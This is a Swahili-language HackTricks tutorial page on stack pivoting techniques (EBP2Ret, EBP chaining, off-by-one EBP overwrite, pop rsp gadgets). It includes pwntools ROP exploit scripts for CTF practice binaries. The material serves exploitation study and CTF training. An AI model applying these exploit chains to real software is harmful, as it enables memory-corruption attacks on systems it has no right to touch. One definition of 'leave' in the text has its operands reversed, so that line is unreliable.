# Stack Pivoting - EBP2Ret - EBP chaining
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
## Taarifa Msingi Mbinu hii inatumia uwezo wa kudhibiti **Msingi wa Alama (EBP)** ili kuunganisha utekelezaji wa kazi nyingi kupitia matumizi makini ya kusajili EBP na mfuatano wa maagizo ya **`leave; ret`**. Kama kumbukumbu, **`leave`** kimsingi inamaanisha: ``` mov ebp, esp pop ebp ret ``` Na kwa kuwa **EBP iko kwenye stack** kabla ya EIP inawezekana kuudhibiti kwa kudhibiti stack. ### EBP2Ret Mbinu hii ni muhimu hasa unapoweza **kubadilisha kisajili cha EBP lakini huna njia moja kwa moja ya kubadilisha kisajili cha EIP**. Inatumia tabia ya kazi wakati zinaisha kutekelezwa. Ikiwa, wakati wa utekelezaji wa `fvuln`, unaweza kuingiza **fake EBP** kwenye stack inayoelekeza kwenye eneo kwenye kumbukumbu ambapo anwani ya shellcode yako iko (pamoja na byte 4 kuhesabu operesheni ya `pop`), unaweza kudhibiti EIP kwa njia isiyo ya moja kwa moja. Wakati `fvuln` inarudi, ESP inawekwa kwenye eneo hili lililoundwa, na operesheni inayofuata ya `pop` inapunguza ESP kwa 4, **kufanya ielekeze kwa anwani iliyohifadhiwa na mshambuliaji hapo.**\ Tambua jinsi unavyohitaji **kujua anwani 2**: Ile ambapo ESP itaenda, ambapo utahitaji kuandika anwani inayoelekezwa na ESP. #### Ujenzi wa Utekaji Kwanza unahitaji kujua **anwani ambapo unaweza kuandika data/anwani za kiholela**. ESP itaelekeza hapa na **kutekeleza `ret` ya kwanza**. Kisha, unahitaji kujua anwani inayotumiwa na `ret` ambayo ita **tekeleza kanuni za kiholela**. Unaweza kutumia: * Anwani halali ya [**ONE\_GADGET**](https://github.com/david942j/one\_gadget). * Anwani ya **`system()`** ikifuatiwa na **byte 4 za taka** na anwani ya `"/bin/sh"` (x86 bits). * Anwani ya kifaa cha **`jump esp;`** ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) ikifuatiwa na **shellcode** ya kutekelezwa. * Baadhi ya mnyororo wa [**ROP**](../rop-return-oriented-programing/). Kumbuka kwamba kabla ya anwani yoyote hizi katika sehemu iliyodhibitiwa ya kumbukumbu, lazima iwe na **`4` byte** kwa sababu ya sehemu ya **`pop`** ya maelekezo ya `leave`. Inawezekana kutumia 4B hizi kuweka **fake EBP ya pili** na kuendelea kudhibiti utekelezaji. #### Utekaji wa Off-By-One Kuna toleo maalum la mbinu hii inayojulikana kama "Utekaji wa Off-By-One". Hutumiwa unapoweza **kubadilisha byte ya thamani ndogo zaidi ya EBP**. Katika kesi kama hiyo, eneo la kumbukumbu linalohifadhi anwani ya kusonga kwenda na **`ret`** lazima iwe na byte tatu za kwanza na EBP, kuruhusu udanganyifu kama huo chini ya hali zilizozuiwa zaidi.\ Kawaida, inabadilishwa byte 0x00 ili kusonga mbali iwezekanavyo. Pia, ni kawaida kutumia RET sled kwenye stack na kuweka mnyororo halisi wa ROP mwishoni ili kufanya iwezekane zaidi kwamba ESP mpya inaelekeza ndani ya RET SLED na mnyororo wa mwisho wa ROP unatekelezwa. ### **EBP Chaining** Hivyo, kwa kuweka anwani iliyodhibitiwa kwenye kuingia ya `EBP` ya stack na anwani ya `leave; ret` katika `EIP`, inawezekana **kuhamisha `ESP` kwenye anwani iliyodhibitiwa ya `EBP` kutoka kwenye stack**. Sasa, **`ESP`** inadhibitiwa ikiashiria kwenye anwani inayotakiwa na maelekezo inayofuata ya kutekelezwa ni `RET`. Ili kutumia hii, inawezekana kuweka mahali pa ESP iliyodhibitiwa hivi: * **`&(EBP bandia inayofuata)`** -> Pakia EBP mpya kwa sababu ya `pop ebp` kutoka kwa maelekezo ya `leave` * **`system()`** -> Kuitwa na `ret` * **`&(leave;ret)`** -> Kuitwa baada ya mfumo kumaliza, itahamisha ESP kwa EBP bandia na kuanza tena * **`&("/bin/sh")`**-> Param kwa `system` Kimsingi njia hii inawezesha kuunganisha EBPs bandia kadhaa kudhibiti mtiririko wa programu. Hii ni kama [ret2lib](../rop-return-oriented-programing/ret2lib/), lakini ni ngumu zaidi bila faida inayoonekana lakini inaweza kuwa ya kuvutia katika hali za kipekee. Zaidi ya hayo, hapa kuna [**mfano wa changamoto**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) inayotumia mbinu hii na **stack leak** kuita kazi ya kushinda. Hii ni mzigo wa mwisho kutoka kwenye ukurasa: ```python from pwn import * elf = context.binary = ELF('./vuln') p = process() p.recvuntil('to: ') buffer = int(p.recvline(), 16) log.success(f'Buffer: {hex(buffer)}') LEAVE_RET = 0x40117c POP_RDI = 0x40122b POP_RSI_R15 = 0x401229 payload = flat( 0x0, # rbp (could be the address of anoter fake RBP) POP_RDI, 0xdeadbeef, POP_RSI_R15, 0xdeadc0de, 0x0, elf.sym['winner'] ) payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP) payload += flat( buffer, # Load leak address in RBP LEAVE_RET # Use leave ro move RSP to the user ROP chain and ret to execute it ) pause() p.sendline(payload) print(p.recvline()) ``` ## EBP huenda isitumike Kama [**ilivyoelezwa katika chapisho hili**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), ikiwa binary imekompiliwa na baadhi ya optimizations, **EBP kamwe haitadhibiti ESP**, hivyo, shambulio lolote linalofanya kazi kwa kudhibiti EBP litashindwa kwa sababu halina athari halisi.\ Hii ni kwa sababu **prologue na epilogue hubadilika** ikiwa binary imeoptimize. * **Haijaoptimize:** ```bash push %ebp # save ebp mov %esp,%ebp # set new ebp sub $0x100,%esp # increase stack size . . . leave # restore ebp (leave == mov %ebp, %esp; pop %ebp) ret # return ``` * **Imeboreshwa:** ```bash push %ebx # save ebx sub $0x100,%esp # increase stack size . . . add $0x10c,%esp # reduce stack size pop %ebx # restore ebx ret # return ``` ## Njia nyingine za kudhibiti RSP ### **Gadget ya `pop rsp`** [Katika ukurasa huu](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) unaweza kupata mfano wa kutumia mbinu hii. Kwa changamoto hii ilikuwa lazima kuita kazi na vigezo 2 maalum, na kulikuwa na **gadget ya `pop rsp`** na kuna **leak kutoka kwenye stack**: ```python # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp # This version has added comments from pwn import * elf = context.binary = ELF('./vuln') p = process() p.recvuntil('to: ') buffer = int(p.recvline(), 16) # Leak from the stack indicating where is the input of the user log.success(f'Buffer: {hex(buffer)}') POP_CHAIN = 0x401225 # pop all of: RSP, R13, R14, R15, ret POP_RDI = 0x40122b POP_RSI_R15 = 0x401229 # pop RSI and R15 # The payload starts payload = flat( 0, # r13 0, # r14 0, # r15 POP_RDI, 0xdeadbeef, POP_RSI_R15, 0xdeadc0de, 0x0, # r15 elf.sym['winner'] ) payload = payload.ljust(104, b'A') # pad to 104 # Start popping RSP, this moves the stack to the leaked address and # continues the ROP chain in the prepared payload payload += flat( POP_CHAIN, buffer # rsp ) pause() p.sendline(payload) print(p.recvline()) ``` ### kifaa cha xchg \, rsp ``` pop <=== return pointer xchg , rsp ``` ### jmp esp Angalia mbinu ya ret2esp hapa: {% content-ref url="../rop-return-oriented-programing/ret2esp-ret2reg.md" %} [ret2esp-ret2reg.md](../rop-return-oriented-programing/ret2esp-ret2reg.md) {% endcontent-ref %} ## Marejeo & Mifano Mingine * [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/) * [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting) * [https://guyinatuxedo.github.io/17-stack\_pivot/dcquals19\_speedrun4/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/dcquals19\_speedrun4/index.html) * 64 bits, off by one exploitation with a rop chain starting with a ret sled * [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html) * 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP. ## ARM64 Katika ARM64, **prologue na epilogue** ya functions **hawaweki na kurejesha SP registry** kwenye stack. Kwa hiyo, kwa chaguo-msingi, **hutaweza kudhibiti SP registry** kwa kubadilisha data fulani ndani ya stack.
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! * Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.